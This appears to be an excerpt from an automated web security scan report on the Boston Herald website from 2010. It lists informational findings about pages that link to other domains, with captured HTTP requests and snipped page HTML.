<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/general/view/20101108desperate_hours_franco_spends_time_with_hiker_who_survived_against_the_odds/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg" alt="James Franco in &lsquo;127 Hours.&rsquo;" /></a>
...[SNIP]...
<a href="/entertainment/movies/dvd/view.bg?articleid=1294553&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/5187df_ltpdvd20101107.jpg" border="0"
width="207" height="181" caption="GROWN UPS" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20101108tracked_down_michelle_mcgee_ty_law_lou_merloni_and_more/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg" alt="Michelle &#x2018;Bombshell&#x2019; McGee,left, and Revolution Rock Bar bartender Caela Scott." /></a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1294606&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/d5c5f8_Tyler_09192010.JPG" border="0"
width="207" height="181" caption="Steven Tyler not sweating Kid Rock snipe" />
</a>
...[SNIP]...
<a
href="/business/general/view/20101108caritas_sale_critic_hits_ethics_board/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg" alt="Martha Coakley." /></a>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<a
href="/jobfind/news/technology/view/20101108polaroid_goes_back_to_the_future_instant_cameras_set_for_age_of_internet/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="REPLAY: The &#36;90 300 Instant Camera(inset) replicates the function of the classic Polaroid camera - more or less, since the printout is about half the size. The &#36;200 Pogo offers both instant and digital photos." /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" style="margin-right:30px;"></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" style="margin-right:30px;"></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif"></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.2. http://bostonherald.com/blogs/entertainment/the_assistant/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/entertainment/the_assistant/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /blogs/entertainment/the_assistant/?srvc=home&position=recent HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:10:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 86832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
News &amp; Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
</strong> Just be grateful you have this magical source of joy, unlike those <a href="http://www.telegraph.co.uk/technology/google/8108086/Turkey-re-bans-YouTube.html" target="_blank">poor deprived kids in Turkey.</a>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/6tMEkcrB9RU?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/6tMEkcrB9RU?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/BptKLS7Eks0?fs=1&amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...
<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/US-73XMMDx4?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/US-73XMMDx4?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/QESfEd180rQ?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/QESfEd180rQ?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/-f_DPrSEOEo?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/-f_DPrSEOEo?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/nLM8xpsAURc?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/nLM8xpsAURc?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/UuQAEVLljF4?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/UuQAEVLljF4?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/8LLly-L77kw?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/8LLly-L77kw?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/isYF5E0WxGU?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/isYF5E0WxGU?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/OmYeuvDMvrY?fs=1&amp;hl=en_US" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/OmYeuvDMvrY?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/vQgbkCd4EYU?fs=1&amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="100" height="100" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" />
...[SNIP]...
<param name="src" value="http://www.youtube.com/v/y2IvWCMH-TU?version=3" /><embed type="application/x-shockwave-flash" width="640" height="390" src="http://www.youtube.com/v/y2IvWCMH-TU?version=3" allowscriptaccess="always" allowfullscreen="true"></embed>
...[SNIP]...
<p>(via <a href="http://tv.gawker.com/5682920/the-funniest-song-about-daylight-savings-youll-hear-this-year" target="_blank">Gawker</a>
...[SNIP]...
<p class="MsoNormal"><a href="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg"><img class="aligncenter" src="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" alt="" width="560" height="375" /></a>
...[SNIP]...
<p class="MsoNormal">Most victims are not raped by strangers. In fact, I read on <a href="http://www.barcc.org" target="_blank">BARCC</a>
...[SNIP]...
</em> has definitely fluctuated in the ratings, and Sweeps week is the time to bring in the heavy artillery. So should we be grateful that a mainstream TV show speaks out about an injustice that <a href="http://www.barcc.org/information/facts/stats" target="_blank">1 in 6 women</a>
...[SNIP]...
<p class="MsoNormal"><a href="http://www.eonline.com/uberblog/watch_with_kristin/b209713_The_Morning_After_Lets_Talk_About_Private_Practice.html" target="_blank">The Morning After: Let&#8217;s Talk About Private Practice</a>
...[SNIP]...
<p class="MsoNormal"><a href="http://nymag.com/daily/entertainment/2010/11/private_practice_rape_episode.html" target="_blank">Nussbaum on Last Night&#8217;s Private Practice Episode</a>
...[SNIP]...
<p class="MsoNormal">(image via <a href="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" target="_blank">nymag.com</a>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="384" height="283" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="align" value="middle" />
...[SNIP]...
<param name="src" value="http://widget.nbc.com/videos/nbcshort_at.swf?CXNID=1000004.10045NXC&amp;widID=4727a250e66f9723&amp;clipID=805561&amp;showID=61" /><embed type="application/x-shockwave-flash" width="384" height="283" src="http://widget.nbc.com/videos/nbcshort_at.swf?CXNID=1000004.10045NXC&amp;widID=4727a250e66f9723&amp;clipID=805561&amp;showID=61" bgcolor="#000000" quality="high" allowfullscreen="true" allowscriptaccess="always" align="middle"></embed>
...[SNIP]...
<p style="text-align: center;">(via <a href="http://www.yasrsly.com/starbuck-barista-sterotypes-customers/8070/" target="_blank">YASRLY</a>
...[SNIP]...
<p style="text-align: center;"><a href="http://kidsclothesclub.org/"><img class="aligncenter size-full wp-image-2200" title="jill" src="http://bostonherald.com/blogs/entertainment/the_assistant/wp-content/uploads/2010/11/jill.jpg" alt="" width="500" height="772" />
...[SNIP]...
<p style="text-align: left;">The <a href="http://www.kidsclothesclub.org" target="_blank">Kids Clothes Club</a>
...[SNIP]...
</strong> this weekend. If you purchase a ticket, you&#8217;re guaranteed the 20% discount and entrance to a tres-chic party at the Wintergarden featuring cocktails and food by <a href="http://www.thecateredaffair.com" target="_blank">The Catered Affair</a>
...[SNIP]...
<td style="padding:2px 1px 0px 5px;"><a style="color:#333; text-decoration:none; font-weight:bold;" href="http://www.colbertnation.com" target="_blank">The Colbert Report</a>
...[SNIP]...
<td style="padding:2px 1px 0px 5px;" colspan="2"><a style="color:#333; text-decoration:none; font-weight:bold;" href="http://www.colbertnation.com/the-colbert-report-videos/364519/november-04-2010/exclusive---elvis-costello---all-i-have-to-do-is-dream" target="_blank">Exclusive - Elvis Costello - All I Have to Do Is Dream</a>
...[SNIP]...
<td style="padding: 2px 5px 0px; overflow: hidden; width: 360px; text-align: right;" colspan="2"><a style="color:#96deff; text-decoration:none; font-weight:bold;" href="http://www.colbertnation.com/" target="_blank">www.colbertnation.com</a>
...[SNIP]...
<td style="padding:0px;" colspan="2"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="360" height="301" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="bgcolor" value="#000000" />
...[SNIP]...
<param name="wmode" value="window" /><embed type="application/x-shockwave-flash" width="360" height="301" src="http://media.mtvnservices.com/mgid:cms:item:comedycentral.com:364519" wmode="window" flashvars="autoPlay=false" bgcolor="#000000"></embed>
...[SNIP]...
<td style="padding: 3px; width: 33%;"><a style="font:10px arial; color:#333; text-decoration:none;" href="http://www.colbertnation.com/full-episodes/" target="_blank">Colbert Report Full Episodes</a>
...[SNIP]...
<td style="padding: 3px; width: 33%;"><a style="font:10px arial; color:#333; text-decoration:none;" href="http://www.indecisionforever.com/" target="_blank">2010 Election</a>
...[SNIP]...
<td style="padding: 3px; width: 33%;"><a style="font:10px arial; color:#333; text-decoration:none;" href="http://www.colbertnation.com/video/tag/March%20to%20Keep%20Fear%20Alive" target="_blank">March to Keep Fear Alive</a>
...[SNIP]...
<p>(via <a href="http://ccinsider.comedycentral.com/2010/11/05/exclusive-stephen-colbert-and-elvis-costello-duet/" target="_blank">Comedy Central</a>
...[SNIP]...
<param name="allowScriptAccess" value="always"><embed src="http://www.youtube.com/v/IwfwgbZPZ9w?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"></object>
...[SNIP]...
<p>(Youtube via <a href="http://tv.gawker.com/5679902/jon-stewart-at-the-1994-boston-college-fest" target="_blank">Gawker tv</a>
...[SNIP]...
<p>For more info on the event or to find tickets, visit the website <a href="http://www.jlboston.org/jlb/npo.jsp?pg=support6" target="_blank">here</a>
...[SNIP]...
<font class=bodyFont color=#333333>


<img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg?sdf=sdfs" style="float:left">

       
<strong>
...[SNIP]...
<a href=http://bostonherald.com/blogs/entertainment/the_assistant/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

8.3. http://bostonherald.com/blogs/lifestyle/fork_lift/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/lifestyle/fork_lift/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /blogs/lifestyle/fork_lift/?p=2367 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:20:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
News &amp; Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift/"><img width="638" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_662x120.jpg" /></a>
...[SNIP]...
